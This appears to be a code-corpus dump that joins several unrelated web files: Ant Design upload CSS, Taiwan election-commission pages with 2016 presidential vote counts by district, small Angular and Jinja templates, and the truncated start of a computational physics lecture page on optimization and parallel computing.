-webkit-animation-name: uploadAnimateInlineIn; animation-name: uploadAnimateInlineIn; } .ant-upload-list .ant-upload-animate-inline-leave { -webkit-animation-name: uploadAnimateInlineOut; animation-name: uploadAnimateInlineOut; } @-webkit-keyframes uploadAnimateInlineIn { from { width: 0; height: 0; margin: 0; padding: 0; opacity: 0; } } @keyframes uploadAnimateInlineIn { from { width: 0; height: 0; margin: 0; padding: 0; opacity: 0; } } @-webkit-keyframes uploadAnimateInlineOut { to { width: 0; height: 0; margin: 0; padding: 0; opacity: 0; } } @keyframes uploadAnimateInlineOut { to { width: 0; height: 0; margin: 0; padding: 0; opacity: 0; } } .ant-upload-rtl { direction: rtl; } .ant-upload-rtl.ant-upload.ant-upload-select-picture-card { margin-right: auto; margin-left: 8px; } .ant-upload-list-rtl { direction: rtl; } .ant-upload-list-rtl .ant-upload-list-item-list-type-text:hover .ant-upload-list-item-name-icon-count-1 { padding-right: 22px; padding-left: 14px; } .ant-upload-list-rtl .ant-upload-list-item-list-type-text:hover .ant-upload-list-item-name-icon-count-2 { padding-right: 22px; padding-left: 28px; } .ant-upload-list-rtl .ant-upload-list-item-name { padding-right: 22px; padding-left: 0; } .ant-upload-list-rtl .ant-upload-list-item-name-icon-count-1 { padding-left: 14px; } .ant-upload-list-rtl .ant-upload-list-item-card-actions { right: auto; left: 0; } .ant-upload-list-rtl .ant-upload-list-item-card-actions .anticon { padding-right: 0; padding-left: 5px; } .ant-upload-list-rtl .ant-upload-list-item-info { padding: 0 4px 0 12px; } .ant-upload-list-rtl .ant-upload-list-item .anticon-close { right: auto; left: 4px; } .ant-upload-list-rtl .ant-upload-list-item-error .ant-upload-list-item-card-actions .anticon { padding-right: 0; padding-left: 5px; } .ant-upload-list-rtl .ant-upload-list-item-progress { padding-right: 26px; padding-left: 0; } .ant-upload-list-picture .ant-upload-list-item-info, .ant-upload-list-picture-card .ant-upload-list-item-info { padding: 0; } .ant-upload-list-rtl.ant-upload-list-picture .ant-upload-list-item-thumbnail, .ant-upload-list-rtl.ant-upload-list-picture-card .ant-upload-list-item-thumbnail { right: 8px; left: auto; } .ant-upload-list-rtl.ant-upload-list-picture .ant-upload-list-item-icon, .ant-upload-list-rtl.ant-upload-list-picture-card .ant-upload-list-item-icon { right: 50%; left: auto; transform: translate(50%, -50%); } .ant-upload-list-rtl.ant-upload-list-picture .ant-upload-list-item-name, .ant-upload-list-rtl.ant-upload-list-picture-card .ant-upload-list-item-name { margin: 0 8px 0 0; padding-right: 48px; padding-left: 8px; } .ant-upload-list-rtl.ant-upload-list-picture .ant-upload-list-item-name-icon-count-1, .ant-upload-list-rtl.ant-upload-list-picture-card .ant-upload-list-item-name-icon-count-1 { padding-right: 48px; padding-left: 18px; } .ant-upload-list-rtl.ant-upload-list-picture .ant-upload-list-item-name-icon-count-2, .ant-upload-list-rtl.ant-upload-list-picture-card .ant-upload-list-item-name-icon-count-2 { padding-right: 48px; padding-left: 36px; } .ant-upload-list-rtl.ant-upload-list-picture .ant-upload-list-item-progress, .ant-upload-list-rtl.ant-upload-list-picture-card .ant-upload-list-item-progress { padding-right: 0; padding-left: 0; } .ant-upload-list-rtl.ant-upload-list-picture .anticon-close, .ant-upload-list-rtl.ant-upload-list-picture-card .anticon-close { right: auto; left: 8px; } .ant-upload-list-rtl .ant-upload-list-picture-card-container { margin: 0 0 8px 8px; } .ant-upload-list-rtl.ant-upload-list-picture-card .ant-upload-list-item-actions { right: 50%; left: auto; transform: translate(50%, -50%); } .ant-upload-list-rtl.ant-upload-list-picture-card .ant-upload-list-item-file + .ant-upload-list-item-name { margin: 8px 0 0; padding: 0; } /*# sourceMappingURL=antd.variable.css.map*/
data/president/n400001600000000/20160116144559/page.html
gugod/vote-watch-2016
<!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Expires" content="-1"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <title>105年第十四任總統副總統及第九屆立法委員選舉</title> <link href="../css/style.css" rel="stylesheet" type="text/css"> <link href="../css/style2.css" rel="stylesheet" type="text/css"> <script type="text/javascript" src="../js/ftiens4.js"></script> <script type="text/javascript" src="../js/ua.js"></script> <script type="text/javascript" src="../js/func.js"></script> <script type="text/javascript" src="../js/treeP1.js"></script> <script type="text/javascript" src="../js/refresh.js"></script> </head> <body id="main-body"> <div id="main-header"> <div id="main-top"> <a class="main-top-logo" href="#">中央選舉委員會</a> <ul class="main-top-list"> <li class="main-top-item"><a class="main-top-link main-top-link-home" href="../index.html">回首頁</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-cec" href="http://2016.cec.gov.tw">中選會網站</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-english" href="../../en/index.html">English</a></li> </ul> </div> </div> <div id="main-wrap"> <div id="main-banner"> <div class="slideshow"> <img src="../img/main_bg_1.jpg" width="1024" height="300" alt="background" title="background"> </div> <div class="main-deco"></div> <div class="main-title"></div> <a class="main-pvpe main-pvpe-current" href="../IDX/indexP1.html">總統副總統選舉</a> <a class="main-le" href="../IDX/indexT.html">立法委員選舉</a> </div> <div id="main-container"> <div id="main-content"> <table width="1024" border="1" cellpadding="0" cellspacing="0"> <tr> <td width="180" valign="top"> <div id="divMenu"> <table border="0"> <tr> <td><a style="text-decoration:none;color:silver" href="http://www.treemenu.net/" target=_blank></a></td> </tr> </table> <span class="TreeviewSpanArea"> <script>initializeDocument()</script> <noscript>請開啟Javascript功能</noscript> </span> </div> </td> <td width="796" valign="top"> <div id="divContent"> <!-- 修改區塊 --> <table width="100%" border="0" cellpadding="0" cellspacing="4"> <tr> <td><img src="../images/search.png" alt="候選人得票數" title="候選人得票數">&nbsp;<b>總統副總統選舉&nbsp;候選人在 臺中市 西屯區得票數&nbsp;</b></td> </tr> <tr valign="bottom"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr valign="bottom"> <td class="fontNumber">&nbsp;<img src="../images/nav.gif" alt="候選組數" title="候選組數">&nbsp;<img src="../images/nav.gif" alt="候選組數" title="候選組數">&nbsp;候選組數:3&nbsp;&nbsp;<img src="../images/nav.gif" alt="應選組數" title="應選組數">&nbsp;<img src="../images/nav.gif" alt="應選組數" title="應選組數">&nbsp;應選組數:1</td> <td align="right"> <select name="selector_order" class="selectC" tabindex="1" id="orderBy" onChange="changeOrder();"> <option value="n">依號次排序</option> <option value="s">依得票排序</option> </select> </td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="6" cellspacing="1" class="tableT"> <tr class="trHeaderT"> <td>註記</td> <td>號次</td> <td><table><tr><td>總統</td><td rowspan=2> 候選人姓名</td></tr><td>副總統</td></table></td> <td>性別</td> <td>得票數</td> <td>得票率%</td> <td>登記方式</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>1</td> <td>朱立倫<br>王如玄</td> <td>男<br>女</td> <td class="tdAlignRight">36,346</td> <td class="tdAlignRight">32.6477</td> <td>中國國民黨&nbsp; 推薦</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>2</td> <td>蔡英文<br>陳建仁</td> <td>女<br>男</td> <td class="tdAlignRight">57,254</td> <td class="tdAlignRight">51.4282</td> <td>民主進步黨&nbsp; 推薦</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>3</td> <td>宋楚瑜<br>徐欣瑩</td> <td>男<br>女</td> <td class="tdAlignRight">17,728</td> <td class="tdAlignRight">15.9241</td> <td>親民黨&nbsp; 推薦</td> </tr> <tr class="trFooterT"> <td colspan="7" align="right">投開票所數 已送/應送:&nbsp;115/115&nbsp;</td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="10"></td> <td valign="top" class="fontNote"> <table> <tr> <td>註記說明:</td> <td align="center">◎</td> <td>自然當選</td> </tr> <tr> <td></td> <td align="center">?</td> <td>同票待抽籤</td> </tr> </table> </td> <td valign="top" class="fontTimer"><img src="../images/clock2.png" alt="Sat, 16 Jan 2016 22:45:10 +0800" title="Sat, 16 Jan 2016 22:45:10 +0800">&nbsp;資料更新時間:&nbsp;01/16&nbsp;22:45:06&nbsp;<br>(網頁每3分鐘自動更新一次)</td> </tr> <tr> <td colspan="3" class="fontNote"></td> </tr> </table> </td> </tr> </table> <!-- 修改區塊 --> </div> </td> </tr> </table> </div> <div class="main-footer"></div> <div id="divFooter" align=center>[中央選舉委員會] </div> <!--main-content--> </div><!--main-container--> </div><!--END main-wrap--> <script>setOrder();</script> <script>setMenuScrollPosY();</script> </body> </html>
src/app/home/home.component.html
noobfan-kevin/S-Linker
<div class="container"> <header> <div class="user-container"> </div> <div class="search-container"></div> </header> <div class="body-container"> <nav> <ul> <li>links</li> <li>history</li> <li>share</li> </ul> </nav> <div> <router-outlet></router-outlet> </div> </div> </div>
data/president/n705000800000000/20160116142337/page.html
gugod/vote-watch-2016
<!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Expires" content="-1"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <title>105年第十四任總統副總統及第九屆立法委員選舉</title> <link href="../css/style.css" rel="stylesheet" type="text/css"> <link href="../css/style2.css" rel="stylesheet" type="text/css"> <script type="text/javascript" src="../js/ftiens4.js"></script> <script type="text/javascript" src="../js/ua.js"></script> <script type="text/javascript" src="../js/func.js"></script> <script type="text/javascript" src="../js/treeP1.js"></script> <script type="text/javascript" src="../js/refresh.js"></script> </head> <body id="main-body"> <div id="main-header"> <div id="main-top"> <a class="main-top-logo" href="#">中央選舉委員會</a> <ul class="main-top-list"> <li class="main-top-item"><a class="main-top-link main-top-link-home" href="../index.html">回首頁</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-cec" href="http://2016.cec.gov.tw">中選會網站</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-english" href="../../en/index.html">English</a></li> </ul> </div> </div> <div id="main-wrap"> <div id="main-banner"> <div class="slideshow"> <img src="../img/main_bg_1.jpg" width="1024" height="300" alt="background" title="background"> </div> <div class="main-deco"></div> <div class="main-title"></div> <a class="main-pvpe main-pvpe-current" href="../IDX/indexP1.html">總統副總統選舉</a> <a class="main-le" href="../IDX/indexT.html">立法委員選舉</a> </div> <div id="main-container"> <div id="main-content"> <table width="1024" border="1" cellpadding="0" cellspacing="0"> <tr> <td width="180" valign="top"> <div id="divMenu"> <table border="0"> <tr> <td><a style="text-decoration:none;color:silver" href="http://www.treemenu.net/" target=_blank></a></td> </tr> </table> <span class="TreeviewSpanArea"> <script>initializeDocument()</script> <noscript>請開啟Javascript功能</noscript> </span> </div> </td> <td width="796" valign="top"> <div id="divContent"> <!-- 修改區塊 --> <table width="100%" border="0" cellpadding="0" cellspacing="4"> <tr> <td><img src="../images/search.png" alt="候選人得票數" title="候選人得票數">&nbsp;<b>總統副總統選舉&nbsp;候選人在 雲林縣 元長鄉得票數&nbsp;</b></td> </tr> <tr valign="bottom"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr valign="bottom"> <td class="fontNumber">&nbsp;<img src="../images/nav.gif" alt="候選組數" title="候選組數">&nbsp;<img src="../images/nav.gif" alt="候選組數" title="候選組數">&nbsp;候選組數:3&nbsp;&nbsp;<img src="../images/nav.gif" alt="應選組數" title="應選組數">&nbsp;<img src="../images/nav.gif" alt="應選組數" title="應選組數">&nbsp;應選組數:1</td> <td align="right"> <select name="selector_order" class="selectC" tabindex="1" id="orderBy" onChange="changeOrder();"> <option value="n">依號次排序</option> <option value="s">依得票排序</option> </select> </td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="6" cellspacing="1" class="tableT"> <tr class="trHeaderT"> <td>註記</td> <td>號次</td> <td><table><tr><td>總統</td><td rowspan=2> 候選人姓名</td></tr><td>副總統</td></table></td> <td>性別</td> <td>得票數</td> <td>得票率%</td> <td>登記方式</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>1</td> <td>朱立倫<br>王如玄</td> <td>男<br>女</td> <td class="tdAlignRight">2,909</td> <td class="tdAlignRight">22.3597</td> <td>中國國民黨&nbsp; 推薦</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>2</td> <td>蔡英文<br>陳建仁</td> <td>女<br>男</td> <td class="tdAlignRight">8,804</td> <td class="tdAlignRight">67.6710</td> <td>民主進步黨&nbsp; 推薦</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>3</td> <td>宋楚瑜<br>徐欣瑩</td> <td>男<br>女</td> <td class="tdAlignRight">1,297</td> <td class="tdAlignRight">9.9693</td> <td>親民黨&nbsp; 推薦</td> </tr> <tr class="trFooterT"> <td colspan="7" align="right">投開票所數 已送/應送:&nbsp;25/25&nbsp;</td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="10"></td> <td valign="top" class="fontNote"> <table> <tr> <td>註記說明:</td> <td align="center">◎</td> <td>自然當選</td> </tr> <tr> <td></td> <td align="center">?</td> <td>同票待抽籤</td> </tr> </table> </td> <td valign="top" class="fontTimer"><img src="../images/clock2.png" alt="Sat, 16 Jan 2016 22:21:11 +0800" title="Sat, 16 Jan 2016 22:21:11 +0800">&nbsp;資料更新時間:&nbsp;01/16&nbsp;22:21:06&nbsp;<br>(網頁每3分鐘自動更新一次)</td> </tr> <tr> <td colspan="3" class="fontNote"></td> </tr> </table> </td> </tr> </table> <!-- 修改區塊 --> </div> </td> </tr> </table> </div> <div class="main-footer"></div> <div id="divFooter" align=center>[中央選舉委員會] </div> <!--main-content--> </div><!--main-container--> </div><!--END main-wrap--> <script>setOrder();</script> <script>setMenuScrollPosY();</script> </body> </html>
templates/jump.html
mccolgst/www.gittip.com
<form id="jump"> {{ _("Jump to {0} from {1}", """<input placeholder='username' autocomplete='off' autocorrect='off' spellcheck='false' size='12' type='text'>"""|safe, """<select> <option value='twitter'>Twitter</option> <option value='facebook'>Facebook</option> <option value='github'>GitHub</option> <option value='bitbucket'>Bitbucket</option> </select>"""|safe) }} <button type="submit">{{ _("Go") }}</button> </form>
data/president/n500001900000000/20160116113054/page.html
gugod/vote-watch-2016
<!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Expires" content="-1"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <title>105年第十四任總統副總統及第九屆立法委員選舉</title> <link href="../css/style.css" rel="stylesheet" type="text/css"> <link href="../css/style2.css" rel="stylesheet" type="text/css"> <script type="text/javascript" src="../js/ftiens4.js"></script> <script type="text/javascript" src="../js/ua.js"></script> <script type="text/javascript" src="../js/func.js"></script> <script type="text/javascript" src="../js/treeP1.js"></script> <script type="text/javascript" src="../js/refresh.js"></script> </head> <body id="main-body"> <div id="main-header"> <div id="main-top"> <a class="main-top-logo" href="#">中央選舉委員會</a> <ul class="main-top-list"> <li class="main-top-item"><a class="main-top-link main-top-link-home" href="../index.html">回首頁</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-cec" href="http://2016.cec.gov.tw">中選會網站</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-english" href="../../en/index.html">English</a></li> </ul> </div> </div> <div id="main-wrap"> <div id="main-banner"> <div class="slideshow"> <img src="../img/main_bg_1.jpg" width="1024" height="300" alt="background" title="background"> </div> <div class="main-deco"></div> <div class="main-title"></div> <a class="main-pvpe main-pvpe-current" href="../IDX/indexP1.html">總統副總統選舉</a> <a class="main-le" href="../IDX/indexT.html">立法委員選舉</a> </div> <div id="main-container"> <div id="main-content"> <table width="1024" border="1" cellpadding="0" cellspacing="0"> <tr> <td width="180" valign="top"> <div id="divMenu"> <table border="0"> <tr> <td><a style="text-decoration:none;color:silver" href="http://www.treemenu.net/" target=_blank></a></td> </tr> </table> <span class="TreeviewSpanArea"> <script>initializeDocument()</script> <noscript>請開啟Javascript功能</noscript> </span> </div> </td> <td width="796" valign="top"> <div id="divContent"> <!-- 修改區塊 --> <table width="100%" border="0" cellpadding="0" cellspacing="4"> <tr> <td><img src="../images/search.png" alt="候選人得票數" title="候選人得票數">&nbsp;<b>總統副總統選舉&nbsp;候選人在 臺南市 楠西區得票數&nbsp;</b></td> </tr> <tr valign="bottom"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr valign="bottom"> <td class="fontNumber">&nbsp;<img src="../images/nav.gif" alt="候選組數" title="候選組數">&nbsp;<img src="../images/nav.gif" alt="候選組數" title="候選組數">&nbsp;候選組數:3&nbsp;&nbsp;<img src="../images/nav.gif" alt="應選組數" title="應選組數">&nbsp;<img src="../images/nav.gif" alt="應選組數" title="應選組數">&nbsp;應選組數:1</td> <td align="right"> <select name="selector_order" class="selectC" tabindex="1" id="orderBy" onChange="changeOrder();"> <option value="n">依號次排序</option> <option value="s">依得票排序</option> </select> </td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="6" cellspacing="1" class="tableT"> <tr class="trHeaderT"> <td>註記</td> <td>號次</td> <td><table><tr><td>總統</td><td rowspan=2> 候選人姓名</td></tr><td>副總統</td></table></td> <td>性別</td> <td>得票數</td> <td>得票率%</td> <td>登記方式</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>1</td> <td>朱立倫<br>王如玄</td> <td>男<br>女</td> <td class="tdAlignRight">1,555</td> <td class="tdAlignRight">31.6250</td> <td>中國國民黨&nbsp; 推薦</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>2</td> <td>蔡英文<br>陳建仁</td> <td>女<br>男</td> <td class="tdAlignRight">2,539</td> <td class="tdAlignRight">51.6372</td> <td>民主進步黨&nbsp; 推薦</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>3</td> <td>宋楚瑜<br>徐欣瑩</td> <td>男<br>女</td> <td class="tdAlignRight">823</td> <td class="tdAlignRight">16.7378</td> <td>親民黨&nbsp; 推薦</td> </tr> <tr class="trFooterT"> <td colspan="7" align="right">投開票所數 已送/應送:&nbsp;9/9&nbsp;</td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="10"></td> <td valign="top" class="fontNote"> <table> <tr> <td>註記說明:</td> <td align="center">◎</td> <td>自然當選</td> </tr> <tr> <td></td> <td align="center">?</td> <td>同票待抽籤</td> </tr> </table> </td> <td valign="top" class="fontTimer"><img src="../images/clock2.png" alt="Sat, 16 Jan 2016 19:30:11 +0800" title="Sat, 16 Jan 2016 19:30:11 +0800">&nbsp;資料更新時間:&nbsp;01/16&nbsp;19:30:06&nbsp;<br>(網頁每3分鐘自動更新一次)</td> </tr> <tr> <td colspan="3" class="fontNote"></td> </tr> </table> </td> </tr> </table> <!-- 修改區塊 --> </div> </td> </tr> </table> </div> <div class="main-footer"></div> <div id="divFooter" align=center>[中央選舉委員會] </div> <!--main-content--> </div><!--main-container--> </div><!--END main-wrap--> <script>setOrder();</script> <script>setMenuScrollPosY();</script> </body> </html>
doc/pub/codeoptimization/html/._codeoptimization-bs095.html
CompPhysics/ComputationalPhysicsMSU
<!-- Automatically generated HTML file from DocOnce source (https://github.com/hplgit/doconce/) --> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="DocOnce: https://github.com/hplgit/doconce/" /> <meta name="description" content="Computational Physics Lectures: How to optimize codes, from vectorization to parallelization"> <title>Computational Physics Lectures: How to optimize codes, from vectorization to parallelization</title> <!-- Bootstrap style: bootstrap --> <link href="https://netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap.min.css" rel="stylesheet"> <!-- not necessary <link href="https://netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.css" rel="stylesheet"> --> <style type="text/css"> /* Add scrollbar to dropdown menus in bootstrap navigation bar */ .dropdown-menu { height: auto; max-height: 400px; overflow-x: hidden; } /* Adds an invisible element before each target to offset for the navigation bar */ .anchor::before { content:""; display:block; height:50px; /* fixed header height for style bootstrap */ margin:-50px 0 0; /* negative fixed header height */ } </style> </head> <!-- tocinfo {'highest level': 2, 'sections': [('Content', 2, None, '___sec0'), ('Optimization and profiling', 2, None, '___sec1'), ('More on optimization', 2, None, '___sec2'), ('Optimization and profiling', 2, None, '___sec3'), ('Optimization and debugging', 2, None, '___sec4'), ('Other hints', 2, None, '___sec5'), ('Vectorization and the basic idea behind parallel computing', 2, None, '___sec6'), ('A rough classification of hardware models', 2, None, '___sec7'), ('Shared memory and distributed memory', 2, None, '___sec8'), ('Different parallel programming paradigms', 2, None, '___sec9'), ('Different parallel programming paradigms', 2, None, '___sec10'), ('What is vectorization?', 2, None, '___sec11'), ('Number of elements that can acted upon', 2, None, '___sec12'), ('Number of elements that can acted upon, examples', 2, None, '___sec13'), ('Number of elements that can acted upon, examples', 2, None, '___sec14'), ('"A simple test case with and without ' 'vectorization":"https://github.com/CompPhysics/ComputationalPhysicsMSU/blob/master/doc/Programs/LecturePrograms/programs/Classes/cpp/program7.cpp"', 2, None, '___sec15'), ('Compiling with and without vectorization', 2, None, '___sec16'), ('Automatic vectorization and vectorization inhibitors, criteria', 2, None, '___sec17'), ('Automatic vectorization and vectorization inhibitors, exit ' 'criteria', 2, None, '___sec18'), ('Automatic vectorization and vectorization inhibitors, ' 'straight-line code', 2, None, '___sec19'), ('Automatic vectorization and vectorization inhibitors, nested ' 'loops', 2, None, '___sec20'), ('Automatic vectorization and vectorization inhibitors, function ' 'calls', 2, None, '___sec21'), ('Automatic vectorization and vectorization inhibitors, data ' 'dependencies', 2, None, '___sec22'), ('Automatic vectorization and vectorization inhibitors, more ' 'data dependencies', 2, None, '___sec23'), ('Automatic vectorization and vectorization inhibitors, memory ' 'stride', 2, None, '___sec24'), ('Compiling with and without vectorization', 2, None, '___sec25'), ('Compiling with and without vectorization using clang', 2, None, '___sec26'), ('Memory management', 2, None, '___sec27'), ('Memory and communication', 2, None, '___sec28'), ('Measuring performance', 2, None, '___sec29'), ('Problems with measuring time', 2, None, '___sec30'), ('Problems with cold start', 2, None, '___sec31'), ('Problems with smart compilers', 2, None, '___sec32'), ('Problems with interference', 2, None, '___sec33'), ('Problems with measuring performance', 2, None, '___sec34'), ('Thomas algorithm for tridiagonal linear algebra equations', 2, None, '___sec35'), ('Thomas algorithm, forward substitution', 2, None, '___sec36'), ('Thomas algorithm, backward substitution', 2, None, '___sec37'), ('Thomas algorithm and counting of operations (floating point ' 'and memory)', 2, None, '___sec38'), ('"The specialized Thomas algorithm (Project ' '1)":"https://github.com/CompPhysics/ComputationalPhysics/blob/master/doc/Projects/2016/Project1/Examples/TridiagonalTiming.cpp"', 2, None, '___sec39'), ('"Example: Transpose of a ' 'matrix":"https://github.com/CompPhysics/ComputationalPhysicsMSU/blob/master/doc/Programs/LecturePrograms/programs/Classes/cpp/program8.cpp"', 2, None, '___sec40'), ('"Matrix-matrix ' 'multiplication":"https://github.com/CompPhysics/ComputationalPhysicsMSU/blob/master/doc/Programs/LecturePrograms/programs/Classes/cpp/program9.cpp"', 2, None, '___sec41'), ('How do we define speedup? Simplest form', 2, None, '___sec42'), ('How do we define speedup? Correct baseline', 2, None, '___sec43'), ('Parallel speedup', 2, None, '___sec44'), ('Speedup and memory', 2, None, '___sec45'), ('Upper bounds on speedup', 2, None, '___sec46'), ("Amdahl's law", 2, None, '___sec47'), ('How much is parallelizable', 2, None, '___sec48'), ("Today's situation of parallel computing", 2, None, '___sec49'), ('Overhead present in parallel computing', 2, None, '___sec50'), ('Parallelizing a sequential algorithm', 2, None, '___sec51'), ('Strategies', 2, None, '___sec52'), ('How do I run MPI on a PC/Laptop? MPI', 2, None, '___sec53'), ('Can I do it on my own PC/laptop? OpenMP installation', 2, None, '___sec54'), ('Installing MPI', 2, None, '___sec55'), ('Installing MPI and using Qt', 2, None, '___sec56'), ('Using ' '"Smaug":"http://comp-phys.net/cluster-info/using-smaug/", the ' 'CompPhys computing cluster', 2, None, '___sec57'), ('What is OpenMP', 2, None, '___sec58'), ('Getting started, things to remember', 2, None, '___sec59'), ('OpenMP syntax', 2, None, '___sec60'), ('Different OpenMP styles of parallelism', 2, None, '___sec61'), ('General code structure', 2, None, '___sec62'), ('Parallel region', 2, None, '___sec63'), ('Hello world, not again, please!', 2, None, '___sec64'), ('Hello world, yet another variant', 2, None, '___sec65'), ('Important OpenMP library routines', 2, None, '___sec66'), ('Private variables', 2, None, '___sec67'), ('Master region', 2, None, '___sec68'), ('Parallel for loop', 2, None, '___sec69'), ('Parallel computations and loops', 2, None, '___sec70'), ('Scheduling of loop computations', 2, None, '___sec71'), ('Example code for loop scheduling', 2, None, '___sec72'), ('Example code for loop scheduling, guided instead of dynamic', 2, None, '___sec73'), ('More on Parallel for loop', 2, None, '___sec74'), ('What can happen with this loop?', 2, None, '___sec75'), ('Inner product', 2, None, '___sec76'), ('Different threads do different tasks', 2, None, '___sec77'), ('Single execution', 2, None, '___sec78'), ('Coordination and synchronization', 2, None, '___sec79'), ('Data scope', 2, None, '___sec80'), ('Some remarks', 2, None, '___sec81'), ('Parallelizing nested for-loops', 2, None, '___sec82'), ('Nested parallelism', 2, None, '___sec83'), ('Parallel tasks', 2, None, '___sec84'), ('Common mistakes', 2, None, '___sec85'), ('Not all computations are simple', 2, None, '___sec86'), ('Not all computations are simple, competing threads', 2, None, '___sec87'), ('How to find the max value using OpenMP', 2, None, '___sec88'), ('Then deal with the race conditions', 2, None, '___sec89'), ('What can slow down OpenMP performance?', 2, None, '___sec90'), ('What can slow down OpenMP performance?', 2, None, '___sec91'), ('Find the max location for each thread', 2, None, '___sec92'), ('Combine the values from each thread', 2, None, '___sec93'), ('"Matrix-matrix ' 'multiplication":"https://github.com/CompPhysics/ComputationalPhysicsMSU/blob/master/doc/Programs/ParallelizationOpenMP/OpenMPvectornorm.cpp"', 2, None, '___sec94'), ('"Matrix-matrix ' 'multiplication":"https://github.com/CompPhysics/ComputationalPhysicsMSU/blob/master/doc/Programs/ParallelizationOpenMP/OpenMPmatrixmatrixmult.cpp"', 2, None, '___sec95'), ('What is Message Passing Interface (MPI)?', 2, None, '___sec96'), ('Going Parallel with MPI', 2, None, '___sec97'), ('MPI is a library', 2, None, '___sec98'), ('Bindings to MPI routines', 2, None, '___sec99'), ('Communicator', 2, None, '___sec100'), ('Some of the most important MPI functions', 2, None, '___sec101'), ('"The first MPI C/C++ ' 'program":"https://github.com/CompPhysics/ComputationalPhysics2/blob/gh-pages/doc/Programs/LecturePrograms/programs/MPI/chapter07/program2.cpp"', 2, None, '___sec102'), ('The Fortran program', 2, None, '___sec103'), ('Note 1', 2, None, '___sec104'), ('"Ordered output with ' 'MPIBarrier":"https://github.com/CompPhysics/ComputationalPhysics2/blob/gh-pages/doc/Programs/LecturePrograms/programs/MPI/chapter07/program3.cpp"', 2, None, '___sec105'), ('Note 2', 2, None, '___sec106'), ('"Ordered ' 'output":"https://github.com/CompPhysics/ComputationalPhysics2/blob/gh-pages/doc/Programs/LecturePrograms/programs/MPI/chapter07/program4.cpp"', 2, None, '___sec107'), ('Note 3', 2, None, '___sec108'), ('Note 4', 2, None, '___sec109'), ('"Numerical integration in ' 'parallel":"https://github.com/CompPhysics/ComputationalPhysics2/blob/gh-pages/doc/Programs/LecturePrograms/programs/MPI/chapter07/program6.cpp"', 2, None, '___sec110'), ('Dissection of trapezoidal rule with $MPI\\_reduce$', 2, None, '___sec111'), ('Dissection of trapezoidal rule', 2, None, '___sec112'), ('Integrating with _MPI_', 2, None, '___sec113'), ('How do I use $MPI\\_reduce$?', 2, None, '___sec114'), ('More on $MPI\\_Reduce$', 2, None, '___sec115'), ('Dissection of trapezoidal rule', 2, None, '___sec116'), ('Dissection of trapezoidal rule', 2, None, '___sec117')]} end of tocinfo --> <body> <script type="text/x-mathjax-config"> MathJax.Hub.Config({ TeX: { equationNumbers: { autoNumber: "none" }, extensions: ["AMSmath.js", "AMSsymbols.js", "autobold.js", "color.js"] } }); </script> <script type="text/javascript" async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML"> </script> <!-- Bootstrap navigation bar --> <div class="navbar navbar-default navbar-fixed-top"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-responsive-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="codeoptimization-bs.html">Computational Physics Lectures: How to optimize codes, from vectorization to parallelization</a> </div> <div class="navbar-collapse collapse navbar-responsive-collapse"> <ul class="nav navbar-nav navbar-right"> <li class="dropdown"> <a href="#" class="dropdown-toggle" data-toggle="dropdown">Contents <b class="caret"></b></a> <ul class="dropdown-menu"> <!-- navigation toc: --> <li><a href="._codeoptimization-bs001.html#___sec0" style="font-size: 80%;">Content</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs002.html#___sec1" style="font-size: 80%;">Optimization and profiling</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs003.html#___sec2" style="font-size: 80%;">More on optimization</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs004.html#___sec3" style="font-size: 80%;">Optimization and profiling</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs005.html#___sec4" style="font-size: 80%;">Optimization and debugging</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs006.html#___sec5" style="font-size: 80%;">Other hints</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs007.html#___sec6" style="font-size: 80%;">Vectorization and the basic idea behind parallel computing</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs008.html#___sec7" style="font-size: 